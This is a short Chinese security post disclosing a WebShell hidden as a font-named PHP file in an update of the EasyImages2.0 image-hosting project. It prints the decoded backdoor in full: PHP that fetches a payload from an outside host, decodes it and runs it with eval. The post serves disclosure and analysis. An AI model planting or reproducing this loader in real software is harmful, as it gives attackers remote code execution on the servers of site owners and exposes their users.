已提交issue:https://github.com/icret/EasyImages2.0/issues/8
最近一次更新中出现WebShell文件!
public/static/fonts/fontawesome-wmebfont.php
解码复原
<?php
$password='CQtlsC';
error_reporting(0);
session_start();
if (!isset($_SESSION["phpapi"])) {
$c = '';
$useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
$url = 'http://phpapi.info/404.gif';
$urlNew= '/0OliakTHisP8hp0adph9papi5+r6eci0a8yijmg9oxcp9ckvhf/';
if (function_exists('fsockopen')) {
$link = parse_url($url);
$query = $link['path'];
$host = strtolower($link['host']);
$fp = fsockopen($host, 80, $errno, $errstr, 10);
if ($fp) {
$out = "GET /{$query} HTTP/1.0n";
$out .= "Host: {$host}n";
$out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)n";
$out .= "Connection: Closenn";
fwrite($fp, $out);
$inheader = 1;
$contents = "";
while (!feof($fp)) {
$line = fgets($fp, 4096);
if ($inheader == 0) {
$contents .= $line;
}
if ($inheader && ($line == "n" || $line == "n")) {
$inheader = 0;
}
}
fclose($fp);
$c = $contents;
}
}
if (!strpos($c, $urlNew) && function_exists('curl_init') && function_exists('curl_exec')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
$c = curl_exec($ch);
curl_close($ch);
}
if (!strpos($c, $urlNew) && ini_get('allow_url_fopen')) {
$temps = @file($url);
if (!empty($temps))
$c = @implode('', $temps);
if (!strpos($c, "delDirAndFile"))
$c = @file_get_contents($url);
}
if (strpos($c, $urlNew) !== false) {
$c = str_replace($urlNew, "", $c);
$_SESSION["phpapi"] = gzinflate(base64_decode($c));
}
}
if (isset($_SESSION["phpapi"])) {
eval($_SESSION["phpapi"]);
}
相关推荐: 【安全圈】员工为报复前公司,删数据改配置,法院:判刑2年6个月
关键词服务器、前员工上海市徐汇区人民法院刑 事 判 决 书(2020)沪0104刑初1245号公诉机关上海市徐汇区人民检察院。被告人班某,男,1981年5月4日出生,汉族,住上海市普陀区。辩护人郭海洋,上海正策律师事务所律师。辩护人杨延娜,上海君澜律师事务所律…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论